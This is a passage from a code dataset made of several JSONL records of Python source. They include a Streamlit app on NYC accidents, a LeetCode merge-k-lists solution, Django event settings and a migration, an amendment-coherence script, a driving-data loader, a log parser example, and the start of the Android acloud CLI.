in your\n#application (one time with the default value, and one time without) [called in pie chart & boxplot, see below)\ndef random_color(length, starting_letter = \"A\"):\n color = [\"#\" + starting_letter + ''.join([random.choice('0123456789ABCDEF') for j in range(5)])\n for i in range(length)]\n return(color)\n\n\n#At least one function with at least two parameters that returns a value\ndef accidents_breakdown(df, factors, boroughs):\n\n # UI Control #2\n which_factor = st.sidebar.selectbox(\"Factor\", factors)\n # UI Control #3\n which_borough = st.sidebar.radio(\"Borough\", boroughs)\n which_result = st.sidebar.selectbox(\"Injured or Killed\", [\"Injured\", \"Killed\"])\n st.title(f\"Accident Factor Breakdown by Injury in {which_borough}\")\n filtered = df[(df[\"VEHICLE 1 FACTOR\"] == which_factor) & (df[\"BOROUGH\"] == which_borough)]\n # #Pandas Features #3 - Pivot Table\n pivot_injured = pd.pivot_table(filtered, index=[\"VEHICLE 1 FACTOR\"],\n values=[\"PEDESTRIANS INJURED\", \"CYCLISTS INJURED\", \"MOTORISTS INJURED\"],\n aggfunc=np.sum)\n pivot_killed = pd.pivot_table(filtered, index=[\"VEHICLE 1 FACTOR\"],\n values=[\"PEDESTRIANS KILLED\", \"CYCLISTS KILLED\", \"MOTORISTS KILLED\"],\n aggfunc=np.sum)\n\n pivot_killed_df = pd.DataFrame(pivot_killed)\n pivot_injured_df = pd.DataFrame(pivot_injured)\n\n explode = []\n count = []\n if which_result == \"Injured\":\n dataframe = pivot_injured_df\n elif which_result == \"Killed\":\n dataframe = pivot_killed_df\n for i in range(0, 3):\n count.append(dataframe.iloc[0,i])\n for i in range(0, 3):\n if count[i] == max(count):\n explode.append(.1)\n else:\n explode.append(0)\n if sum(count) == 0:\n \"No Accidents with that Criteria \"\n else:\n fig, ax = plt.subplots()\n plt.rcParams['font.sans-serif'] = 'Arial'\n plt.rcParams['font.family'] = 'sans-serif'\n plt.rcParams['text.color'] = 'black'\n plt.rcParams['axes.labelcolor'] = 'slategrey'\n plt.rcParams['xtick.color'] = 'slategrey'\n plt.rcParams['ytick.color'] = 'slategrey'\n plt.rcParams['font.size'] = 12\n color_palette_list = random_color(3, \"B\")\n labels = [\"CYCLISTS INJURED\", \"MOTORISTS INJURED\", \"PEDESTRIANS INJURED\"]\n ax.pie(count, explode=explode, labels=None,\n colors=color_palette_list, autopct='%1.0f%%',\n shadow=False, startangle=0,\n pctdistance=1.2, labeldistance=1.5)\n ax.axis('equal')\n ax.set_title(f\"Breakdown of Accident Victims by Type ({which_result})\")\n ax.legend(frameon=False, bbox_to_anchor=(2, 0.8), labels = labels)\n st.set_option('deprecation.showPyplotGlobalUse', False)\n st.pyplot()\n\n if which_result == \"Injured\":\n st.dataframe(pivot_injured)\n label = \"PERSONS INJURED\"\n elif which_result == \"Killed\":\n st.dataframe(pivot_killed)\n label = \"PERSONS KILLED\"\n\n st.title(\"Breakdown by Vehicle Type\")\n vehicle_types = list(filtered[\"VEHICLE 1 TYPE\"])\n #Interacting with a Dictionary:\n color_dict = dict(zip(vehicle_types, random_color(len(vehicle_types))))\n\n #Use of function from the Python module you selected and researched\n #Used Seaborn boxplot feature\n boxplot = sns.boxplot(y=filtered[\"VEHICLE 1 TYPE\"], x=filtered[label], palette=color_dict)\n boxplot.axes.set_title(f\"Breakdown of {which_result} by Vehicle Type\", fontsize=16)\n boxplot.set_ylabel(\"Vehicle Type\")\n st.set_option('deprecation.showPyplotGlobalUse', False)\n st.pyplot()\n\ndef main():\n st.title(\"Welcome to the NYC Accidents Breakdown Interactive Webpage\")\n first_option = st.selectbox(\"Would you like to see a map or a breakdown of accidents in NYC?\", [\"Map\", \"Breakdown\"])\n if first_option == \"Map\":\n accidents_map(df)\n elif first_option == \"Breakdown\":\n accidents_breakdown(df, factors, boroughs)\n\nmain()\n\n\n\n##DOCUMENTED CODE:\n#Error ' Map Date Input Code:\n#https://newbedev.com/streamlit-date-input-format-code-example\n#Streamlit Form :https://blog.streamlit.io/introducing-submit-button-and-forms/\n#Plotting help: https://towardsdatascience.com/python-plotting-basics-simple-charts-with-matplotlib-seaborn-and-plotly-e36346952a3a\n#Generate random color : https://stackoverflow.com/questions/28999287/generate-random-colors-rgb\n","sub_path":"finalproject.py","file_name":"finalproject.py","file_ext":"py","file_size_in_byte":8309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"98589604","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n# author: bigfoolliu\n\n\n\"\"\"\n给你一个链表数组,每个链表都已经按升序排列。\n\n请你将所有链表合并到一个升序链表中,返回合并后的链表。\n\n \n\n示例 1:\n\n输入:lists = [[1,4,5],[1,3,4],[2,6]]\n输出:[1,1,2,3,4,4,5,6]\n解释:链表数组如下:\n[\n 1->4->5,\n 1->3->4,\n 2->6\n]\n将它们合并到一个有序链表中得到。\n1->1->2->3->4->4->5->6\n示例 2:\n\n输入:lists = []\n输出:[]\n示例 3:\n\n输入:lists = [[]]\n输出:[]\n \n\n提示:\n\nk == lists.length\n0 <= k <= 10^4\n0 <= lists[i].length <= 500\n-10^4 <= lists[i][j] <= 10^4\nlists[i] 按 升序 排列\nlists[i].length 的总和不超过 10^4\n\n\n来源:力扣(LeetCode)\n链接:https://leetcode-cn.com/problems/merge-k-sorted-lists\n著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\n\"\"\"\n\nimport doctest\nfrom typing import List\n\n\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\n\nclass Solution:\n \"\"\"\n \"\"\"\n\n def mergeKLists(self, lists: List[ListNode]) -> ListNode:\n \"\"\"\n 直观思路,将所有的链表的值取出来,排序之后构造新的链表\n \"\"\"\n nodes = []\n # 将所有的结点取出来\n for list_node in lists:\n cur = list_node\n while cur:\n nodes.append(cur.val)\n cur = cur.next\n\n nodes.sort()\n\n dummy = ListNode(-1)\n cur = dummy\n for node in nodes:\n cur.next = ListNode(node)\n cur = cur.next\n \n return dummy.next\n\n\nif __name__ == '__main__':\n doctest.testmod()\n","sub_path":"algorithms/leetcode/hard/0023_合并K个升序链表.py","file_name":"0023_合并K个升序链表.py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"123432553","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nimport locale\nfrom django.conf import settings as site_settings\nlocale.setlocale(locale.LC_ALL, '')\n\n\nDEFAULT_SETTINGS = {\n 'CATEGORY_TYPES': [\n 'award',\n 'carnival',\n 'cocktail',\n 'commemoration',\n 'competition',\n 'conference',\n 'congress',\n 'concert',\n 'course',\n 'dinner',\n 'entertainment',\n 'exhibition',\n 'family',\n 'friends',\n 'festival',\n 'lecture',\n 'market',\n 'meeting',\n 'networking',\n 'outdoor',\n 'parade',\n 'party',\n 'past locations',\n 'peregrination',\n 'seminar',\n 'spectacle',\n 'talk',\n 'trade show',\n 'general',\n 'visit',\n ],\n 'ENTITY_TYPES': (\n 'Attendee',\n 'Author',\n 'Band',\n 'Contributor',\n 'Host',\n 'Moderator',\n 'Organizer',\n 'Panelist',\n 'Performer',\n 'Singer',\n 'Social',\n 'Speaker',\n 'Speakers',\n 'Special Guest',\n 'Sponsor',\n ),\n 'DEFAULT_COUNTRY': 'US',\n 'STATE_CHOICES': (\n ('AL', 'Alabama'),\n ('AK', 'Alaska'),\n ('AZ', 'Arizona'),\n ('AR', 'Arkansas'),\n ('CA', 'California'),\n ('CO', 'Colorado'),\n ('CT', 'Connecticut'),\n ('DE', 'Delaware'),\n ('DC', 'District of Columbia'),\n ('FL', 'Florida'),\n ('GA', 'Georgia'),\n ('HI', 'Hawaii'),\n ('ID', 'Idaho'),\n ('IL', 'Illinois'),\n ('IN', 'Indiana'),\n ('IA', 'Iowa'),\n ('KS', 'Kansas'),\n ('KY', 'Kentucky'),\n ('LA', 'Louisiana'),\n ('ME', 'Maine'),\n ('MD', 'Maryland'),\n ('MA', 'Massachusetts'),\n ('MI', 'Michigan'),\n ('MN', 'Minnesota'),\n ('MS', 'Mississippi'),\n ('MO', 'Missouri'),\n ('MT', 'Montana'),\n ('NE', 'Nebraska'),\n ('NV', 'Nevada'),\n ('NH', 'New Hampshire'),\n ('NJ', 'New Jersey'),\n ('NM', 'New Mexico'),\n ('NY', 'New York'),\n ('NC', 'North Carolina'),\n ('ND', 'North Dakota'),\n ('OH', 'Ohio'),\n ('OK', 'Oklahoma'),\n ('OR', 'Oregon'),\n ('PA', 'Pennsylvania'),\n ('RI', 'Rhode Island'),\n ('SC', 'South Carolina'),\n ('SD', 'South Dakota'),\n ('TN', 'Tennessee'),\n ('TX', 'Texas'),\n ('UT', 'Utah'),\n ('VT', 'Vermont'),\n ('VA', 'Virginia'),\n ('WA', 'Washington'),\n ('WV', 'West Virginia'),\n ('WI', 'Wisconsin'),\n ('WY', 'Wyoming'),\n ),\n 'DAY_CHOICES': (\n ('', '---'),\n (locale.nl_langinfo(locale.DAY_1).lower(), locale.nl_langinfo(locale.DAY_1)),\n (locale.nl_langinfo(locale.DAY_2).lower(), locale.nl_langinfo(locale.DAY_2)),\n (locale.nl_langinfo(locale.DAY_3).lower(), locale.nl_langinfo(locale.DAY_3)),\n (locale.nl_langinfo(locale.DAY_4).lower(), locale.nl_langinfo(locale.DAY_4)),\n (locale.nl_langinfo(locale.DAY_5).lower(), locale.nl_langinfo(locale.DAY_5)),\n (locale.nl_langinfo(locale.DAY_6).lower(), locale.nl_langinfo(locale.DAY_6)),\n (locale.nl_langinfo(locale.DAY_7).lower(), locale.nl_langinfo(locale.DAY_7)),\n ),\n 'CURRENCY_CHOICES': (\n ('USD', 'US Dollar'),\n ),\n 'DEFAULT_CURRENCY': 'USD',\n 'ACCESS_CHOICES': (\n ('PUBLIC', 'Public'),\n ('PRIVATE', 'Private'),\n ),\n 'DEFAULT_ACCESS': 'PUBLIC',\n 'STORAGE': None,\n 'RELATION_MODELS': [],\n 'RELATION_TYPES': (\n \"Key Image\",\n \"Key Video\",\n \"Alternative Event\",\n \"Related Event\",\n \"Enclosure Event\",\n \"Current/Traveling Exhibition\",\n ),\n 'PLACE_AMENITY_TYPES': (\n 'Accessibility',\n 'Contact Us',\n 'Directions & Parking',\n 'During Your Visit',\n 'Gift Certificate',\n 'Group Sales',\n 'Hours & Ticket Pricing',\n 'Museum Store',\n 'Parking',\n 'Pricing',\n 'Schools & Youth Groups',\n 'Ticketing',\n 'Visiting Info',\n ),\n 'EVENT_AMENITY_TYPES': [\n 'Check-in',\n 'Event Schedule',\n 'Inclement Weather',\n 'Learn More',\n 'Registration',\n ],\n 'ARCHIVE_EVENT_IN_DAYS': 7,\n 'EVENT_TYPES': [\n ('event', 'Event'),\n ('current exhibition', 'Exhibition'),\n ('traveling exhibition', 'Traveling Exhibition'),\n ],\n 'IMAGE_MODEL_IMAGE_FIELD': 'image',\n 'IMAGE_MODEL_WIDTH_FIELD': 'width',\n 'IMAGE_MODEL_HEIGHT_FIELD': 'height',\n\n # IMAGE_MODEL_RESIZER: A callable or string representing method to import\n # method must accept (image_object, required_width, required_height)\n # and return image_url\n 'IMAGE_MODEL_RESIZER': None,\n}\n\nUSER_SETTINGS = DEFAULT_SETTINGS.copy()\nUSER_SETTINGS.update(getattr(site_settings, 'HAPPENINGS_SETTINGS', {}))\n\n# The EVENT_AMENITY_TYPES should be a super-set of PLACE_AMENITY_TYPES.\nUSER_SETTINGS['EVENT_AMENITY_TYPES'] = sorted(list(set(USER_SETTINGS['EVENT_AMENITY_TYPES']) | set(USER_SETTINGS['PLACE_AMENITY_TYPES'])))\n\nglobals().update(USER_SETTINGS)\n","sub_path":"happenings/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":5196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"122507049","text":"# -*- coding: utf-8 -*-\n\nimport re\nimport os\nimport sys\nfrom unidecode import unidecode\nimport pandas as pd\nimport nltk\nfrom gensim.models import KeyedVectors\nfrom sklearn.feature_extraction.text import CountVectorizer\nimport ClassificadorDeEmendas as clfe\nimport plObjFunc as pl\n\n\ndef proc_agreg_out(agr_out):\n bet_quote = re.compile(r\"\\'(.*?)\\'\", flags=re.IGNORECASE)\n existe_agreg = False\n if re.search('__INICIO_AGREGADOR__', emd):\n nxt = emd.split(\"__INICIO_AGREGADOR__\\n\")[1]\n if re.search(r'.+\\n(?=__FIM_AGREGADOR__)', nxt):\n ent = nxt.split('__FIM_AGREGADOR__')[0]\n existe_agreg = True\n\n lista_indices = []\n if existe_agreg:\n for item in ent.splitlines():\n item = re.findall(bet_quote, item)\n pl_index = []\n\n # Le todos os casos, cria uma lista com os indices para o obj pl\n for nr, index in enumerate(item):\n try:\n if nr == 0 or nr == 1:\n pl_index.append(int(index.split('_')[1]))\n if nr == 2:\n pl_index.append(pl.roman_to_int(index.split('_')[1]))\n if nr == 3:\n pl_index.append(pl.ali_to_num(index.split('_')[1]))\n except:\n pl_index.append(None)\n\n # Tratamento de casos especiais\n # Desconsidera caso não exista artigo\n if not pl_index[0]:\n continue\n # Caso receba somente artigo e não parágrafo, use o\n # parágrafo 0\n if pl_index[0] and not pl_index[1] and pl_index[2]:\n pl_index[1] = 0\n # Caso receba somente artigo e alinea\n if (pl_index[0] and not pl_index[1] and not pl_index[3] and\n pl_index[3]):\n pl_index[1] = 0\n pl_index[2] = 1\n\n # Retira valores None e inserir indices para correta localização\n pl_index = [i for i in pl_index if i is not None]\n if len(pl_index) == 4:\n pl_index.insert(2, 1)\n pl_index.insert(-1, 1)\n if len(pl_index) == 3:\n pl_index.insert(-1, 1)\n\n lista_indices.append(pl_index)\n return lista_indices\n\n# =============================================================================\nmpv = pl.PlObjCreate('./teste/mpv870/MPV870_txt_site.txt')\nemd_dir_path = '../parser_itens/emd_pars_agreg'\nmodelPath = '../coherence/languagemodel/vectors_new.bin'\n# =============================================================================\n\n\n# Caminho para o arquivo .txt do inteiro teor\n#mpv = pl.PlObjCreate(sys.argv[1])\n# Caminho para a pasta contendo as emendas tratadas pelo agregador\n#emd_dir_path = sys.argv[2]\n# Caminho para o modelo .bin treinado do Skipgram\n#modelPath = sys.argv[3]\n\nstp_wrd = nltk.download('stopwords')\ntokenizer = CountVectorizer(stop_words=stp_wrd).build_tokenizer()\nmodel = KeyedVectors.load_word2vec_format(modelPath, binary=True)\n\nfiles = []\nfor dirpath, dirnames, filenames in os.walk(emd_dir_path):\n for filename in filenames:\n files.append(os.path.normpath(os.path.join(dirpath, filename)))\n\ntipos_de_emenda = clfe.preve_emenda(emd_dir_path)\n\nto_df_row = []\nfor file, tipo_emenda in zip(files, tipos_de_emenda):\n # Checa o tipo de emenda\n if tipo_emenda == 'O':\n continue\n\n with open(file, mode='r', encoding='utf8') as emenda:\n lista_de_itens_alterados = []\n\n emd = emenda.read()\n texto_emd = tokenizer(unidecode(emd.split(\"!@#$%\")[0].lower()))\n\n # Processa emendas pós agregador\n\n lista_de_itens_alterados = proc_agreg_out(emd)\n\n for alteracao in lista_de_itens_alterados:\n if tipo_emenda == 'MOD':\n # Procura posição no plObj\n try:\n texto_pl = pl.nested_lookup(mpv[1], alteracao)\n\n # Cria uma string inteira com todos os textos na\n # posição encontrada\n texto_pl = ' '.join(list(pl.flatten(texto_pl))).lower()\n texto_pl = tokenizer(unidecode(texto_pl))\n\n alteracao = [str(i) for i in alteracao]\n dist = model.wmdistance(texto_pl, texto_emd)\n to_df_row.append([file, ' '.join(str(alteracao)), dist])\n\n except IndexError:\n alteracao = [str(i) for i in alteracao]\n print(\"Elemento não encontrado {}, {}\".format(file,\n alteracao))\n\ndf = pd.DataFrame(to_df_row, index=True, columns=['file', 'item', 'dist'])\ndf.to_csv('df_csv.csv')\n","sub_path":"PLSintetica/emd_item_coherence.py","file_name":"emd_item_coherence.py","file_ext":"py","file_size_in_byte":4744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"434897511","text":"\"\"\"\nPython module to load the data for training\n\"\"\"\nimport cv2\nimport csv\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nimport matplotlib.image as mpimg\nfrom sklearn.utils import shuffle\nfrom tqdm import tqdm\n\n# Function to load dataset\ndef load_dataset(csv_path, relative_path):\n \"\"\"\n Inputs\n ---\n csv_path: path to training data csv\n relative_path: relative path to training data\n\n Outputs\n ---\n X: Training data numpy array\n y: Training labels numpy array\n \"\"\"\n # Read CSV lines\n lines = []\n with open(csv_path) as csvfile:\n reader = csv.reader(csvfile)\n print(\"Loading CSV File ...\")\n for line in tqdm(reader):\n lines.append(line)\n \n images = []; measurements = []\n print(\"Loading Data ...\")\n\n # Read from CSV lines\n for line in tqdm(lines):\n # Center Image\n image, measurement = _load_image(line, 0, relative_path)\n images.append(image)\n measurements.append(measurement)\n\n image_flipped = np.fliplr(image)\n images.append(image_flipped)\n\n measurement_flipped = -1 * measurement\n measurements.append(measurement_flipped)\n\n # Left Image\n image, measurement = _load_image(line, 1, relative_path)\n images.append(image)\n measurements.append(measurement)\n\n image_flipped = np.fliplr(image)\n images.append(image_flipped)\n\n measurement_flipped = -1 * measurement\n measurements.append(measurement_flipped)\n\n # Right Image\n image, measurement = _load_image(line, 2, relative_path)\n images.append(image)\n measurements.append(measurement)\n\n image_flipped = np.fliplr(image)\n images.append(image_flipped)\n\n measurement_flipped = -1 * measurement\n measurements.append(measurement_flipped)\n\n X = np.array(images)\n y = np.array(measurements)\n\n return X, y\n\n# Function to generate a Generator\ndef load_generator(csv_path, relative_path, batch_size = 5):\n \"\"\"\n Inputs\n ---\n csv_path: csv file to read data from\n relative_path: relative path of the data\n batch_size: batch size of the generator (factor of 6)\n\n Outputs\n ---\n generator: generator function\n \"\"\"\n # Read CSV lines\n lines = []\n with open(csv_path) as csvfile:\n reader = csv.reader(csvfile)\n print(\"Loading CSV File ...\")\n for line in tqdm(reader):\n lines.append(line)\n \n train_data, validation_data = train_test_split(lines, test_size=0.2)\n\n # Define a generator function\n def generator(data, batch_size = batch_size):\n num_data = len(data)\n while True:\n shuffle(data)\n for offset in range(0, num_data, batch_size):\n batch_data = data[offset : offset + batch_size]\n\n images = []; measurements = []\n # Generate batches\n for batch in batch_data:\n # Center Image\n image, measurement = _load_image(batch, 0, relative_path)\n images.append(image)\n measurements.append(measurement)\n\n image_flipped = np.fliplr(image)\n images.append(image_flipped)\n\n measurement_flipped = -1 * measurement\n measurements.append(measurement_flipped)\n\n # Left Image\n image, measurement = _load_image(batch, 1, relative_path)\n images.append(image)\n measurements.append(measurement)\n\n image_flipped = np.fliplr(image)\n images.append(image_flipped)\n\n measurement_flipped = -1 * measurement\n measurements.append(measurement_flipped)\n\n # Right Image\n image, measurement = _load_image(batch, 2, relative_path)\n images.append(image)\n measurements.append(measurement)\n\n image_flipped = np.fliplr(image)\n images.append(image_flipped)\n\n measurement_flipped = -1 * measurement\n measurements.append(measurement_flipped)\n \n X = np.array(images)\n y = np.array(measurements)\n\n X, y = shuffle(X, y)\n yield (X, y)\n \n return generator(train_data), generator(validation_data), len(train_data), len(validation_data)\n\n# Private function to load image\ndef _load_image(line, index, relative_path):\n \"\"\"\n Inputs\n ---\n line: csv line to read data from\n index: decides left, right or center\n relative_path: relative path of the data\n\n Outputs\n ---\n image: output image\n measurement: output measurement\n \"\"\"\n source_path = line[index]\n filename = source_path.split('\\\\')[-1]\n current_path = relative_path + filename\n image = mpimg.imread(current_path)\n\n if index == 1:\n # Left Image\n correction = 0.2\n elif index == 2:\n # Right Image\n correction = -0.2\n else:\n # Center Image\n correction = 0\n\n measurement = float(line[3]) + correction\n\n return image, measurement","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":5263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"311471257","text":"#!/usr/bin/env python3\nimport sys\nfrom Kwogger.Kwogger import KwogParse\n\nfor log_name in ['example_task', 'example_beat']:\n\n log = KwogParse(log_name=log_name)\n\n try:\n mode = sys.argv[1]\n except IndexError:\n mode = 'print'\n\n print(f'MODE: {mode}')\n\n if mode == 'elasticsearch':\n log.send_to_elasticsearch()\n\n elif mode == 'mongodb':\n log.send_to_mongodb()\n\n elif mode == 'print':\n for entry in log:\n print(entry)\n\n else:\n raise ValueError(f'Invalid mode {mode}')\n","sub_path":"example_parser.py","file_name":"example_parser.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"313585202","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\nfrom django.utils.timezone import utc\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('todolist', '0005_auto_20150929_0745'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='todolist',\n name='deadline',\n field=models.CharField(default=datetime.datetime(2015, 9, 29, 17, 47, 17, 439443, tzinfo=utc), max_length=10),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='todolist',\n name='email',\n field=models.EmailField(max_length=254, null=True, verbose_name=b'signup'),\n ),\n ]\n","sub_path":"todolist/migrations/0006_auto_20150929_1747.py","file_name":"0006_auto_20150929_1747.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"615988313","text":"#!/usr/bin/env python\n#\n# Copyright 2016 - The Android Open Source Project\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nr\"\"\"Cloud Android Driver.\n\nThis CLI manages google compute engine project for android devices.\n\n- Prerequisites:\n See: go/acloud-manual\n\n- Configuration:\n The script takes a required configuration file, which should look like\n \n # If using service account\n service_account_name: \"your_account@developer.gserviceaccount.com\"\n service_account_private_key_path: \"/path/to/your-project.p12\"\n\n # If using OAuth2 authentication flow\n client_id: \n client_secret: \n\n # Optional\n ssh_private_key_path: \"~/.ssh/acloud_rsa\"\n ssh_public_key_path: \"~/.ssh/acloud_rsa.pub\"\n orientation: \"portrait\"\n resolution: \"800x1280x32x213\"\n network: \"default\"\n machine_type: \"n1-standard-1\"\n extra_data_disk_size_gb: 10 # 4G or 10G\n\n # Required\n project: \"your-project\"\n zone: \"us-central1-f\"\n storage_bucket_name: \"your_google_storage_bucket_name\"\n \n\n Save it at /path/to/acloud.config\n\n- Example calls:\n - Create two instances:\n $ acloud.par create\n --build_target gce_x86_phone-userdebug_fastbuild3c_linux \\\n --build_id 3744001 --num 2 --config_file /path/to/acloud.config \\\n --report_file /tmp/acloud_report.json --log_file /tmp/acloud.log\n\n - Delete two instances:\n $ acloud.par delete --instance_names\n ins-b638cdba-3744001-gce-x86-phone-userdebug-fastbuild3c-linux\n --config_file /path/to/acloud.config\n --report_file /tmp/acloud_report.json --log_file /tmp/acloud.log\n\"\"\"\nimport argparse\nimport getpass\nimport logging\nimport os\nimport sys\n\nfrom acloud.internal import constants\nfrom acloud.public import acloud_common\nfrom acloud.public import config\nfrom acloud.public import device_driver\nfrom acloud.public import errors\n\nLOGGING_FMT = \"%(asctime)s |%(levelname)s| %(module)s:%(lineno)s| %(message)s\"\nLOGGER_NAME = \"acloud_main\"\n\n# Commands\nCMD_CREATE = \"create\"\nCMD_DELETE = \"delete\"\nCMD_CLEANUP = \"cleanup\"\nCMD_SSHKEY = \"project_sshkey\"\n\n\ndef _ParseArgs(args):\n \"\"\"Parse args.\n\n Args:\n args: Argument list passed from main.\n\n Returns:\n Parsed args.\n \"\"\"\n usage = \",\".join([CMD_CREATE, CMD_DELETE, CMD_CLEANUP, CMD_SSHKEY])\n parser = argparse.ArgumentParser(\n description=__doc__,\n formatter_class=argparse.RawDescriptionHelpFormatter,\n usage=\"%(prog)s {\" + usage + \"} ...\")\n subparsers = parser.add_subparsers()\n subparser_list = []\n\n # Command \"create\"\n create_parser = subparsers.add_parser(CMD_CREATE)\n create_parser.required = False\n create_parser.set_defaults(which=CMD_CREATE)\n create_parser.add_argument(\n \"--build_target\",\n type=str,\n dest=\"build_target\",\n help=\"Android build target, e.g. gce_x86-userdebug, \"\n \"or short names: phone, tablet, or tablet_mobile.\")\n create_parser.add_argument(\n \"--branch\",\n type=str,\n dest=\"branch\",\n help=\"Android branch, e.g. mnc-dev or git_mnc-dev\")\n # TODO(fdeng): Support HEAD (the latest build)\n create_parser.add_argument(\"--build_id\",\n type=str,\n dest=\"build_id\",\n help=\"Android build id, e.g. 2145099, P2804227\")\n create_parser.add_argument(\n \"--spec\",\n type=str,\n dest=\"spec\",\n required=False,\n help=\"The name of a pre-configured device spec that we are \"\n \"going to use. Choose from: %s\" % \", \".join(constants.SPEC_NAMES))\n create_parser.add_argument(\"--num\",\n type=int,\n dest=\"num\",\n required=False,\n default=1,\n help=\"Number of instances to create.\")\n create_parser.add_argument(\n \"--gce_image\",\n type=str,\n dest=\"gce_image\",\n required=False,\n help=\"Name of an existing compute engine image to reuse.\")\n create_parser.add_argument(\"--local_disk_image\",\n type=str,\n dest=\"local_disk_image\",\n required=False,\n help=\"Path to a local disk image to use, \"\n \"e.g /tmp/avd-system.tar.gz\")\n create_parser.add_argument(\n \"--no_cleanup\",\n dest=\"no_cleanup\",\n default=False,\n action=\"store_true\",\n help=\"Do not clean up temporary disk image and compute engine image. \"\n \"For debugging purposes.\")\n create_parser.add_argument(\n \"--serial_log_file\",\n type=str,\n dest=\"serial_log_file\",\n required=False,\n help=\"Path to a *tar.gz file where serial logs will be saved \"\n \"when a device fails on boot.\")\n create_parser.add_argument(\n \"--logcat_file\",\n type=str,\n dest=\"logcat_file\",\n required=False,\n help=\"Path to a *tar.gz file where logcat logs will be saved \"\n \"when a device fails on boot.\")\n\n subparser_list.append(create_parser)\n\n # Command \"Delete\"\n delete_parser = subparsers.add_parser(CMD_DELETE)\n delete_parser.required = False\n delete_parser.set_defaults(which=CMD_DELETE)\n delete_parser.add_argument(\n \"--instance_names\",\n dest=\"instance_names\",\n nargs=\"+\",\n required=True,\n help=\"The names of the instances that need to delete, \"\n \"separated by spaces, e.g. --instance_names instance-1 instance-2\")\n subparser_list.append(delete_parser)\n\n # Command \"cleanup\"\n cleanup_parser = subparsers.add_parser(CMD_CLEANUP)\n cleanup_parser.required = False\n cleanup_parser.set_defaults(which=CMD_CLEANUP)\n cleanup_parser.add_argument(\n \"--expiration_mins\",\n type=int,\n dest=\"expiration_mins\",\n required=True,\n help=\"Garbage collect all gce instances, gce images, cached disk \"\n \"images that are older than |expiration_mins|.\")\n subparser_list.append(cleanup_parser)\n\n # Command \"project_sshkey\"\n sshkey_parser = subparsers.add_parser(CMD_SSHKEY)\n sshkey_parser.required = False\n sshkey_parser.set_defaults(which=CMD_SSHKEY)\n sshkey_parser.add_argument(\n \"--user\",\n type=str,\n dest=\"user\",\n default=getpass.getuser(),\n help=\"The user name which the sshkey belongs to, default to: %s.\" %\n getpass.getuser())\n sshkey_parser.add_argument(\n \"--ssh_rsa_path\",\n type=str,\n dest=\"ssh_rsa_path\",\n required=True,\n help=\"Absolute path to the file that contains the public rsa key \"\n \"that will be added as project-wide ssh key.\")\n subparser_list.append(sshkey_parser)\n\n # Add common arguments.\n for p in subparser_list:\n acloud_common.AddCommonArguments(p)\n\n return parser.parse_args(args)\n\n\ndef _TranslateAlias(parsed_args):\n \"\"\"Translate alias to Launch Control compatible values.\n\n This method translates alias to Launch Control compatible values.\n - branch: \"git_\" prefix will be added if branch name doesn't have it.\n - build_target: For example, \"phone\" will be translated to full target\n name \"git_x86_phone-userdebug\",\n\n Args:\n parsed_args: Parsed args.\n\n Returns:\n Parsed args with its values being translated.\n \"\"\"\n if parsed_args.which == CMD_CREATE:\n if (parsed_args.branch and\n not parsed_args.branch.startswith(constants.BRANCH_PREFIX)):\n parsed_args.branch = constants.BRANCH_PREFIX + parsed_args.branch\n parsed_args.build_target = constants.BUILD_TARGET_MAPPING.get(\n parsed_args.build_target, parsed_args.build_target)\n return parsed_args\n\n\ndef _VerifyArgs(parsed_args):\n \"\"\"Verify args.\n\n Args:\n parsed_args: Parsed args.\n\n Raises:\n errors.CommandArgError: If args are invalid.\n \"\"\"\n if parsed_args.which == CMD_CREATE:\n if (parsed_args.spec and parsed_args.spec not in constants.SPEC_NAMES):\n raise errors.CommandArgError(\n \"%s is not valid. Choose from: %s\" %\n (parsed_args.spec, \", \".join(constants.SPEC_NAMES)))\n if not ((parsed_args.build_id and parsed_args.build_target) or\n parsed_args.gce_image or parsed_args.local_disk_image):\n raise errors.CommandArgError(\n \"At least one of the following should be specified: \"\n \"--build_id and --build_target, or --gce_image, or \"\n \"--local_disk_image.\")\n if bool(parsed_args.build_id) != bool(parsed_args.build_target):\n raise errors.CommandArgError(\n \"Must specify --build_id and --build_target at the same time.\")\n if (parsed_args.serial_log_file and\n not parsed_args.serial_log_file.endswith(\".tar.gz\")):\n raise errors.CommandArgError(\n \"--serial_log_file must ends with .tar.gz\")\n if (parsed_args.logcat_file and\n not parsed_args.logcat_file.endswith(\".tar.gz\")):\n raise errors.CommandArgError(\n \"--logcat_file must ends with .tar.gz\")\n\n\ndef _SetupLogging(log_file, verbose, very_verbose):\n \"\"\"Setup logging.\n\n Args:\n log_file: path to log file.\n verbose: If True, log at DEBUG level, otherwise log at INFO level.\n very_verbose: If True, log at DEBUG 